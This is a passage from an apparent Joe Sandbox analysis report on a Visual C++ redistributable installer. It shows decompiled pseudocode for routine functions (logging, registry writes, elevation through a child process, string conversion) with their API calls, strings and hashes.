                                                                          • GetLastError.KERNEL32(?,00055AC5,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 000562FB
                                                                          • GetLastError.KERNEL32(?,00055AC5,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 00056321
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast$Write$Pointer
                                                                          • String ID: @Met$dlutil.cpp
                                                                          • API String ID: 133221148-1896680629
                                                                          • Opcode ID: 04ccf8eeee1a6867857f2aa9ed82292a124a95268b0e3c1e54dd0c0734e76af9
                                                                          • Instruction ID: bd3627624020c4d4625252508e8126151e1376805e22b6a250f4d963501472c6
                                                                          • Opcode Fuzzy Hash: 04ccf8eeee1a6867857f2aa9ed82292a124a95268b0e3c1e54dd0c0734e76af9
                                                                          • Instruction Fuzzy Hash: 2F417E72900619BFEF218E94CD48BEB7BA8EF04352F540225FD04E7190D776DD64DAA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000501F0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 123COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 63%
                                                                          			E000501F0(void* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				short _v528;
				short _v1048;
				char _v1052;
				struct HINSTANCE__* _v1056;
				struct HINSTANCE__* _v1060;
				long _v1064;
				void* __ebp;
				signed int _t25;
				long _t29;
				intOrPtr _t46;
				intOrPtr _t47;
				void* _t52;
				void* _t53;
				void* _t54;
				char* _t56;
				void* _t61;
				unsigned int _t62;
				unsigned int _t64;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t72;
				intOrPtr _t74;
				void* _t75;
				signed int _t76;
				void* _t77;

				_t68 = __edx;
				_t25 =  *0x7a008; // 0xfbf51acb
				_v8 = _t25 ^ _t76;
				_push(__ebx);
				_push(__esi);
				_t74 =  *0x7a77c; // 0x76238
				_push(__edi);
				_v1064 = 0x104;
				_v1060 = 0;
				_v1056 = 0;
				_v1052 = 0;
				_t29 = GetModuleFileNameW(0,  &_v528, 0x104);
				_t70 = 0x208;
				if(_t29 == 0) {
					E0003F670(0x208,  &_v528, 0, 0x208);
					_t77 = _t77 + 0xc;
				}
				if(E00054932( &_v528,  &_v1060,  &_v1056) < 0) {
					_v1060 = 0;
					_v1056 = 0;
				}
				if(GetComputerNameW( &_v1048,  &_v1064) != 0) {
					L7:
					E0005858F(_t70, _t83,  &_v1052, 0);
					_push(_v1052);
					_push("=== Logging started: %ls ===");
					_t71 = 2;
					_push(_t71);
					E0005061A();
					_t62 = _v1056;
					_push(_t62 & 0x0000ffff);
					_push(_t62 >> 0x10);
					_t64 = _v1060;
					_push(_t64 & 0x0000ffff);
					_push(_t64 >> 0x10);
					E0005061A(_t71, "Executable: %ls v%d.%d.%d.%d",  &_v528);
					E0005061A(_t71, "Computer  : %ls",  &_v1048);
					_t46 =  *0x7a778; // 0x3
					_t47 = _t46;
					if(_t47 == 0) {
						_t74 =  *0x7a790; // 0x76264
					} else {
						_t52 = _t47 - 1;
						if(_t52 == 0) {
							_t74 =  *0x7a780; // 0x76240
						} else {
							_t53 = _t52 - 1;
							if(_t53 == 0) {
								_t74 =  *0x7a784; // 0x76248
							} else {
								_t54 = _t53 - 1;
								if(_t54 == 0) {
									_t74 =  *0x7a788; // 0x76254
								} else {
									if(_t54 == 1) {
										_t74 =  *0x7a78c; // 0x7625c
									}
								}
							}
						}
					}
					E0005061A(_t71, "--- logging level: %hs ---", _t74);
					_pop(_t72);
					_pop(_t75);
					_pop(_t61);
					if(_v1052 != 0) {
						E000554EF(_v1052);
					}
					return E0003DE36(_t61, _v8 ^ _t76, _t68, _t72, _t75);
				} else {
					_t56 =  &_v1048;
					do {
						 *_t56 = 0;
						_t56 = _t56 + 1;
						_t70 = _t70 - 1;
						_t83 = _t70;
					} while (_t70 != 0);
					goto L7;
				}
			}






























                                                                          0x000501f0
                                                                          0x000501f9
                                                                          0x00050200
                                                                          0x00050203
                                                                          0x00050204
                                                                          0x00050205
                                                                          0x00050210
                                                                          0x00050212
                                                                          0x00050220
                                                                          0x00050228
                                                                          0x0005022e
                                                                          0x00050234
                                                                          0x0005023a
                                                                          0x00050241
                                                                          0x0005024c
                                                                          0x00050251
                                                                          0x00050251
                                                                          0x00050270
                                                                          0x00050272
                                                                          0x00050278
                                                                          0x00050278
                                                                          0x00050294
                                                                          0x000502a4
                                                                          0x000502ac
                                                                          0x000502b1
                                                                          0x000502b7
                                                                          0x000502be
                                                                          0x000502bf
                                                                          0x000502c0
                                                                          0x000502c5
                                                                          0x000502ce
                                                                          0x000502d2
                                                                          0x000502d3
                                                                          0x000502dc
                                                                          0x000502e6
                                                                          0x000502ee
                                                                          0x00050300
                                                                          0x00050305
                                                                          0x0005030d
                                                                          0x0005030f
                                                                          0x00050345
                                                                          0x00050311
                                                                          0x00050311
                                                                          0x00050314
                                                                          0x0005033d
                                                                          0x00050316
                                                                          0x00050316
                                                                          0x00050319
                                                                          0x00050335
                                                                          0x0005031b
                                                                          0x0005031b
                                                                          0x0005031e
                                                                          0x0005032d
                                                                          0x00050320
                                                                          0x00050323
                                                                          0x00050325
                                                                          0x00050325
                                                                          0x00050323
                                                                          0x0005031e
                                                                          0x00050319
                                                                          0x00050314
                                                                          0x00050352
                                                                          0x00050361
                                                                          0x00050362
                                                                          0x00050363
                                                                          0x00050364
                                                                          0x0005036c
                                                                          0x0005036c
                                                                          0x00050380
                                                                          0x00050296
                                                                          0x00050296
                                                                          0x0005029c
                                                                          0x0005029c
                                                                          0x0005029e
                                                                          0x0005029f
                                                                          0x0005029f
                                                                          0x0005029f
                                                                          0x00000000
                                                                          0x0005029c

                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000001,00000000,00000000), ref: 00050234
                                                                          • GetComputerNameW.KERNEL32 ref: 0005028C
                                                                          Strings
                                                                          • --- logging level: %hs ---, xrefs: 0005034C
                                                                          • === Logging started: %ls ===, xrefs: 000502B7
                                                                          • Computer : %ls, xrefs: 000502FA
                                                                          • Executable: %ls v%d.%d.%d.%d, xrefs: 000502E8
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Name$ComputerFileModule
                                                                          • String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
                                                                          • API String ID: 2577110986-3153207428
                                                                          • Opcode ID: 281e540511a1e53c7dadeec74054f304a4b578aff2d0a8a931629aaad167f8ad
                                                                          • Instruction ID: 42fda82c59dfa4c7091e6e9f9e23ef85938b636d115a5ed222975b2081a9ef53
                                                                          • Opcode Fuzzy Hash: 281e540511a1e53c7dadeec74054f304a4b578aff2d0a8a931629aaad167f8ad
                                                                          • Instruction Fuzzy Hash: 674174F2E001189BDB609F64DC89AEF77BCEB45301F4041A9FE09A7102D6399E89CF65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0005143C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 123stringregistryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 73%
                                                                          			E0005143C(void* _a4, short* _a8, intOrPtr _a12, signed int _a16) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _t43;
				signed int _t45;
				signed short _t52;
				signed int _t62;
				signed int _t64;
				char* _t65;
				signed int _t66;
				signed int _t68;
				void* _t70;
				char* _t74;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t82;
				signed int _t83;

				_t64 = _a16;
				_t43 = 0;
				_v16 = _v16 & 0;
				_t74 = 0;
				_v8 = 0;
				if(_t64 != 0) {
					_t66 = 0;
					_t45 = 1;
					_v12 = 0;
					_a16 = 1;
					if(_t64 == 0) {
						L5:
						_t77 = E00011EDE( &_v8, _t45);
						if(_t77 < 0) {
							L14:
							_t74 = _v8;
							L15:
							if(_t74 != 0) {
								E000554EF(_t74);
							}
							return _t77;
						}
						_t74 = _v8;
						_t78 = 0;
						_v12 = 0;
						if(_t64 == 0) {
							L10:
							_t43 = _a16;
							_t65 = _t74;
							L11:
							_push( &_v16);
							_t68 = 2;
							_push(_t43 * _t68 >> 0x20);
							_push(_t43 * _t68);
							_t77 = E00016E2E();
							if(_t77 < 0) {
								goto L15;
							}
							_t52 = RegSetValueExW(_a4, _a8, 0, 7, _t65, _v16);
							if(_t52 != 0) {
								_t81 =  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
								_t77 =  >=  ? 0x80004005 :  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
								E000137D3(0x80004005, "regutil.cpp", 0x35c, _t77);
							}
							goto L14;
						} else {
							goto L7;
						}
						while(1) {
							L7:
							_t77 = E00011BEA(_t74, _a16,  *((intOrPtr*)(_a12 + _t78 * 4)));
							if(_t77 < 0) {
								goto L14;
							}
							_t82 = _v12;
							lstrlenW( *(_a12 + _t82 * 4));
							_t74 = _t74 + lstrlenW( *(_a12 + _t82 * 4)) * 2 + 2;
							_t78 = _t82 + 1;
							_v12 = _t78;
							if(_t78 < _t64) {
								continue;
							}
							_t74 = _v8;
							goto L10;
						}
						goto L14;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t76 = _t45;
						_t83 = _t45;
						_t62 = lstrlenW( *(_a12 + _t66 * 4));
						_t70 = _a16 + 1 + _t62;
						_t45 =  >=  ? _t70 : _t62 | 0xffffffff;
						_a16 = _t45;
						asm("sbb esi, esi");
						_t77 = _t83 & 0x80070216;
						if(_t70 < _t76) {
							goto L14;
						}
						_t66 = _v12 + 1;
						_v12 = _t66;
						if(_t66 < _t64) {
							continue;
						}
						goto L5;
					}
					goto L14;
				}
				_t65 = 0x76440;
				goto L11;
			}





















                                                                          0x00051443
                                                                          0x00051446
                                                                          0x00051448
                                                                          0x0005144d
                                                                          0x0005144f
                                                                          0x00051454
                                                                          0x00051462
                                                                          0x00051464
                                                                          0x00051465
                                                                          0x00051468
                                                                          0x0005146d
                                                                          0x000514af
                                                                          0x000514b9
                                                                          0x000514bd
                                                                          0x0005156f
                                                                          0x0005156f
                                                                          0x00051572
                                                                          0x00051574
                                                                          0x00051577
                                                                          0x00051577
                                                                          0x00051584
                                                                          0x00051584
                                                                          0x000514c3
                                                                          0x000514c6
                                                                          0x000514c8
                                                                          0x000514cd
                                                                          0x00051514
                                                                          0x00051514
                                                                          0x00051517
                                                                          0x00051519
                                                                          0x0005151c
                                                                          0x0005151f
                                                                          0x00051522
                                                                          0x00051523
                                                                          0x00051529
                                                                          0x0005152d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005153d
                                                                          0x00051545
                                                                          0x00051552
                                                                          0x0005155c
                                                                          0x0005156a
                                                                          0x0005156a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000514cf
                                                                          0x000514cf
                                                                          0x000514de
                                                                          0x000514e2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000514eb
                                                                          0x000514f1
                                                                          0x00051506
                                                                          0x00051509
                                                                          0x0005150a
                                                                          0x0005150f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00051511
                                                                          0x00000000
                                                                          0x00051511
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005146f
                                                                          0x0005146f
                                                                          0x0005146f
                                                                          0x00051471
                                                                          0x00051479
                                                                          0x00051485
                                                                          0x0005148c
                                                                          0x00051491
                                                                          0x00051494
                                                                          0x00051496
                                                                          0x0005149e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000514a7
                                                                          0x000514a8
                                                                          0x000514ad
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000514ad
                                                                          0x00000000
                                                                          0x0005146f
                                                                          0x00051456
                                                                          0x00000000

                                                                          APIs
                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,BundleUpgradeCode,?,00020006,00000000,?,?,?,00000001), ref: 00051479
                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,?,00000000,00000001,00000000,00000000,BundleUpgradeCode,?,00020006,00000000,?,?,?,00000001), ref: 000514F1
                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000001), ref: 000514FD
                                                                          • RegSetValueExW.ADVAPI32(00020006,?,00000000,00000007,00000000,?,00000000,?,?,00000000,00000001,00000000,00000000,BundleUpgradeCode,?,00020006), ref: 0005153D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$Value
                                                                          • String ID: BundleUpgradeCode$regutil.cpp
                                                                          • API String ID: 198323757-1648651458
                                                                          • Opcode ID: d0faab18e7d4b043753918eef4405e07d52a08612730d58e6139217810d9cce4
                                                                          • Instruction ID: a6d94f7fe0f3407765f960474b5a5b9dc4eab2edc9726e5328c0c4ecff4a8d4b
                                                                          • Opcode Fuzzy Hash: d0faab18e7d4b043753918eef4405e07d52a08612730d58e6139217810d9cce4
                                                                          • Instruction Fuzzy Hash: 9641D232E0062AAFCF21DFA8C844AEF7BEAEF44711F114129FD05A7251E634DD558B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002D206 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 120COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 21%
                                                                          			E0002D206(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* __ecx;
				intOrPtr* _t18;
				void* _t43;
				void* _t57;
				intOrPtr _t58;
				void* _t60;
				void* _t61;
				void* _t64;

				_v8 = _v8 | 0xffffffff;
				_t58 = _a4;
				_t18 =  *((intOrPtr*)(_t58 + 0xc8));
				_t61 = E0001D58B(_t58 + 0xb8, 1,  *((intOrPtr*)( *_t18 + 0x74))(_t18, _t57, _t60, _t43));
				if(_t61 >= 0) {
					_push(__ebx);
					_t41 = _t58 + 0x4a0;
					if(E00024B96(_t58 + 0x4a0, __edx, _t58 + 0x4a0, _t58 + 0x4a4) >= 0) {
						if(E00024CE8(_t41, 1,  &_v8) >= 0) {
							_push(0x2000000a);
							_push(2);
							E0001550F();
							while(1) {
								_t64 = E00024ED2( *((intOrPtr*)(_t58 + 0x49c)), _t41, 1, _a8);
								if(_t64 >= 0) {
									break;
								}
								if(_t64 != 0x800704c7) {
									L13:
									if(_t64 < 0) {
										goto L14;
									}
								} else {
									_t64 = 0x80070642;
									if(E0001D742(0x80070642,  *((intOrPtr*)(_t58 + 0xc8)), 0, 0, 0x80070642, 0, 0x15, 0) == 4) {
										continue;
									} else {
										L14:
										_push("Failed to elevate.");
										goto L16;
									}
								}
								goto L17;
							}
							_push(0x2000000b);
							_push(2);
							E0001550F();
							_t64 = E000252E3(_t41);
							if(_t64 < 0) {
								_push("Failed to connect to elevated child process.");
								goto L16;
							} else {
								_push(0x2000000c);
								_push(2);
								E0001550F();
								goto L13;
							}
						} else {
							_push("Failed to create pipe and cache pipe.");
							goto L16;
						}
					} else {
						_push("Failed to create pipe name and client token.");
						L16:
						_push(_t64);
						E0005012F();
					}
					L17:
				} else {
					E000137D3(_t21, "elevation.cpp", 0x100, _t61);
					_push("UX aborted elevation requirement.");
					_push(_t61);
					E0005012F();
				}
				if(_v8 != 0) {
					CloseHandle(_v8);
					_v8 = _v8 & 0x00000000;
				}
				if(_t64 < 0) {
					E00024B2B(_t58 + 0x4a0);
				}
				return _t64;
			}












                                                                          0x0002d20a
                                                                          0x0002d210
                                                                          0x0002d213
                                                                          0x0002d22e
                                                                          0x0002d232
                                                                          0x0002d256
                                                                          0x0002d25e
                                                                          0x0002d26e
                                                                          0x0002d28a
                                                                          0x0002d296
                                                                          0x0002d29b
                                                                          0x0002d29d
                                                                          0x0002d2a4
                                                                          0x0002d2b5
                                                                          0x0002d2b9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002d2c1
                                                                          0x0002d30d
                                                                          0x0002d30f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002d2c3
                                                                          0x0002d2d7
                                                                          0x0002d2e1
                                                                          0x00000000
                                                                          0x0002d2e3
                                                                          0x0002d311
                                                                          0x0002d311
                                                                          0x00000000
                                                                          0x0002d311
                                                                          0x0002d2e1
                                                                          0x00000000
                                                                          0x0002d2c1
                                                                          0x0002d2e5
                                                                          0x0002d2ea
                                                                          0x0002d2ec
                                                                          0x0002d2f9
                                                                          0x0002d2fd
                                                                          0x0002d318
                                                                          0x00000000
                                                                          0x0002d2ff
                                                                          0x0002d2ff
                                                                          0x0002d304
                                                                          0x0002d306
                                                                          0x00000000
                                                                          0x0002d30c
                                                                          0x0002d28c
                                                                          0x0002d28c
                                                                          0x00000000
                                                                          0x0002d28c
                                                                          0x0002d270
                                                                          0x0002d270
                                                                          0x0002d31d
                                                                          0x0002d31d
                                                                          0x0002d31e
                                                                          0x0002d324
                                                                          0x0002d325
                                                                          0x0002d234
                                                                          0x0002d23f
                                                                          0x0002d244
                                                                          0x0002d249
                                                                          0x0002d24a
                                                                          0x0002d250
                                                                          0x0002d32a
                                                                          0x0002d32f
                                                                          0x0002d335
                                                                          0x0002d335
                                                                          0x0002d33b
                                                                          0x0002d344
                                                                          0x0002d344
                                                                          0x0002d350

                                                                          APIs
                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000001,0005B4F0,?,00000001,000000FF,?,?,76B6A770,00000000,00000001,00000000,?,000272F3), ref: 0002D32F
                                                                          Strings
                                                                          • Failed to connect to elevated child process., xrefs: 0002D318
                                                                          • UX aborted elevation requirement., xrefs: 0002D244
                                                                          • Failed to create pipe and cache pipe., xrefs: 0002D28C
                                                                          • Failed to elevate., xrefs: 0002D311
                                                                          • Failed to create pipe name and client token., xrefs: 0002D270
                                                                          • elevation.cpp, xrefs: 0002D23A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
                                                                          • API String ID: 2962429428-3003415917
                                                                          • Opcode ID: 49ea958c1ed116fb8da180411aee06e62bb364f23f1d63b05b832b5814928225
                                                                          • Instruction ID: c55c2736b0c35b8d026de1c9d829134a0e9536bc661fb242331040bfdc38db10
                                                                          • Opcode Fuzzy Hash: 49ea958c1ed116fb8da180411aee06e62bb364f23f1d63b05b832b5814928225
                                                                          • Instruction Fuzzy Hash: D831FD72A45732BAE7259660EC46FEF775DDF00721F100117FA09AA1C2DA61EE404296
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00012436 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 118COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 27%
                                                                          			E00012436(signed int __edx, intOrPtr* _a4, short* _a8, signed int _a12, int _a16) {
				signed int _t16;
				int _t17;
				signed int _t18;
				signed short _t22;
				intOrPtr _t23;
				intOrPtr* _t25;
				signed short _t28;
				int _t31;
				short* _t40;
				void* _t41;
				intOrPtr _t43;
				int _t45;
				signed int _t48;
				int _t50;
				int _t52;
				intOrPtr* _t53;

				_t39 = _a4;
				_t45 = __edx | 0xffffffff;
				_t16 = _a12;
				_t31 = 0;
				_t52 = 0;
				_t48 = _t16;
				if( *_a4 == 0) {
					L4:
					_t40 = _a8;
					if(_t16 != 0) {
						if(0 == _t40[_t16]) {
							_t48 = _t16 - 1;
						}
						L11:
						_t17 = _t48 + 1;
						if(_t52 >= _t17) {
							L20:
							_t18 = _a12;
							_push(_t31);
							_push(_t31);
							_push(_t52);
							_t53 = _a4;
							_push( *_t53);
							_t41 = 0xffffffff;
							_t19 =  ==  ? _t41 : _t18;
							if(WideCharToMultiByte(_a16, _t31, _a8,  ==  ? _t41 : _t18, ??, ??, ??, ??) != 0) {
								 *(_t48 +  *_t53) = _t31;
								L23:
								return _t31;
							}
							_t22 = GetLastError();
							_t35 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
							_t23 = 0x80004005;
							_t31 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
							_push(_t31);
							_push(0x1de);
							L7:
							_push("strutil.cpp");
							E000137D3(_t23);
							goto L23;
						}
						_t52 = _t17;
						if(_t52 < 0x7fffffff) {
							_t25 = _a4;
							_push(1);
							_push(_t52);
							if( *_t25 == _t31) {
								_t23 = E000138D4();
							} else {
								_push( *_t25);
								_t23 = E00013A72();
							}
							_t43 = _t23;
							if(_t43 != 0) {
								 *_a4 = _t43;
								goto L20;
							} else {
								_t31 = 0x8007000e;
								_push(0x8007000e);
								_push(0x1d7);
								goto L7;
							}
						}
						_t31 = 0x8007000e;
						goto L23;
					}
					_t50 = WideCharToMultiByte(_a16, _t31, _t40, _t45, _t31, _t31, _t31, _t31);
					if(_t50 != 0) {
						_t48 = _t50 - 1;
						goto L11;
					}
					_t28 = GetLastError();
					_t38 =  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
					_t23 = 0x80004005;
					_t31 =  >=  ? 0x80004005 :  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
					_push(_t31);
					_push(0x1bc);
					goto L7;
				}
				_t52 = E00013B51( *_t39);
				_t45 = _t45 | 0xffffffff;
				if(_t52 != _t45) {
					_t16 = _t48;
					goto L4;
				}
				_t31 = 0x80070057;
				goto L23;
			}



















                                                                          0x00012439
                                                                          0x0001243c
                                                                          0x0001243f
                                                                          0x00012444
                                                                          0x00012446
                                                                          0x00012449
                                                                          0x0001244d
                                                                          0x0001246b
                                                                          0x0001246b
                                                                          0x00012470
                                                                          0x000124c4
                                                                          0x000124c6
                                                                          0x000124c6
                                                                          0x000124c9
                                                                          0x000124c9
                                                                          0x000124ce
                                                                          0x00012514
                                                                          0x00012514
                                                                          0x00012519
                                                                          0x0001251a
                                                                          0x0001251b
                                                                          0x0001251c
                                                                          0x0001251f
                                                                          0x00012523
                                                                          0x00012524
                                                                          0x00012537
                                                                          0x00012564
                                                                          0x00012567
                                                                          0x0001256d
                                                                          0x0001256d
                                                                          0x00012539
                                                                          0x0001254a
                                                                          0x0001254d
                                                                          0x00012554
                                                                          0x00012557
                                                                          0x00012558
                                                                          0x000124ac
                                                                          0x000124ac
                                                                          0x000124b1
                                                                          0x00000000
                                                                          0x000124b1
                                                                          0x000124d0
                                                                          0x000124d8
                                                                          0x000124e4
                                                                          0x000124e7
                                                                          0x000124e9
                                                                          0x000124ec
                                                                          0x000124f7
                                                                          0x000124ee
                                                                          0x000124ee
                                                                          0x000124f0
                                                                          0x000124f0
                                                                          0x000124fc
                                                                          0x00012500
                                                                          0x00012512
                                                                          0x00000000
                                                                          0x00012502
                                                                          0x00012502
                                                                          0x00012507
                                                                          0x00012508
                                                                          0x00000000
                                                                          0x00012508
                                                                          0x00012500
                                                                          0x000124da
                                                                          0x00000000
                                                                          0x000124da
                                                                          0x00012482
                                                                          0x00012486
                                                                          0x000124bb
                                                                          0x00000000
                                                                          0x000124bb
                                                                          0x00012488
                                                                          0x00012499
                                                                          0x0001249c
                                                                          0x000124a3
                                                                          0x000124a6
                                                                          0x000124a7
                                                                          0x00000000
                                                                          0x000124a7
                                                                          0x00012456
                                                                          0x00012458
                                                                          0x0001245d
                                                                          0x00012469
                                                                          0x00000000
                                                                          0x00012469
                                                                          0x0001245f
                                                                          0x00000000

                                                                          APIs
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0004FEE7,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0004FEE7,?,00000000,00000000), ref: 0001247C
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0004FEE7,?,00000000,00000000,0000FDE9), ref: 00012488
                                                                            • Part of subcall function 00013B51: GetProcessHeap.KERNEL32(00000000,000001C7,?,000121DC,000001C7,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00013B59
                                                                            • Part of subcall function 00013B51: HeapSize.KERNEL32(00000000,?,000121DC,000001C7,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00013B60
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                          • String ID: @Met$strutil.cpp
                                                                          • API String ID: 3662877508-569070560
                                                                          • Opcode ID: 556b0167b3c8f271ef8cf1a19a1b7cbbf5421706bb613dafe030852b1a98cb81
                                                                          • Instruction ID: 3f07d4d370b8b60397779339228b333eff8419a316babeb2d46810fb0453545b
                                                                          • Opcode Fuzzy Hash: 556b0167b3c8f271ef8cf1a19a1b7cbbf5421706bb613dafe030852b1a98cb81
                                                                          • Instruction Fuzzy Hash: 0131BE71200719AFFB209E788CC4AFB32DEEB44364B104229F915DB1A0EB75DCA08764
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00033750 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 69%
                                                                          			E00033750(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t55;
				intOrPtr* _t59;
				char _t61;
				void* _t62;

				_t61 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				if(_a8 > 0) {
					_t59 = _a4 + 8;
					do {
						if(_a24 == 0) {
							if(_a16 == 0) {
								L9:
								_t36 =  *((intOrPtr*)(_t59 - 4));
							} else {
								_t36 =  *_t59;
								if( *_t59 == 0) {
									goto L9;
								}
							}
							_t61 = E000171CF(_a12, _t36,  &_v8, 0);
							if(_t61 < 0) {
								goto L20;
							} else {
								goto L11;
							}
						} else {
							if(_a16 == 0) {
								L5:
								_t44 =  *((intOrPtr*)(_t59 - 4));
							} else {
								_t44 =  *_t59;
								if( *_t59 == 0) {
									goto L5;
								}
							}
							_t61 = E000171E9(_a12, _t44,  &_v8, 0);
							L11:
							if(_t61 < 0) {
								L20:
								_push("Failed to format property value.");
								goto L21;
							} else {
